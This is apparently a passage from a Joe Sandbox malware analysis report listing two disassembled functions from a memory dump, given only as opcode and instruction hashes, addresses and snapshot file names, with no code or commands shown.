                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 29ddd776d2dbe913a17473041e7d02223b22204b402a64c1f8219eab31bc2c79
                                                                                • Instruction ID: c9f9c2285ebc2dd151f38c65c746416ea4bd32492746505ea3839753dde445e0
                                                                                • Opcode Fuzzy Hash: 29ddd776d2dbe913a17473041e7d02223b22204b402a64c1f8219eab31bc2c79
                                                                                • Instruction Fuzzy Hash: 4731C221B1C94D0FE798EB6C886A779B6C2EF99315F4501BEE00EC32EBDD64AC418341
                                                                                Function 00007FFD9B780D19 Relevance: .1, Instructions: 124COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2477573799.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_7ffd9b780000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6377afa7b6e072cd911b771a372121d9f419ea47807e857c6b395d78404c147b
                                                                                • Instruction ID: ef4b4cc84f606ee63085262efc9774e7b6ec1f281ec3d76b26d9d9b77cabc3fd
                                                                                • Opcode Fuzzy Hash: 6377afa7b6e072cd911b771a372121d9f419ea47807e857c6b395d78404c147b
                                                                                • Instruction Fuzzy Hash: CF31C321B19E0D4FE794BBAC58697BDB7D2EF98611F1402BAE00DC32D7DD2869018792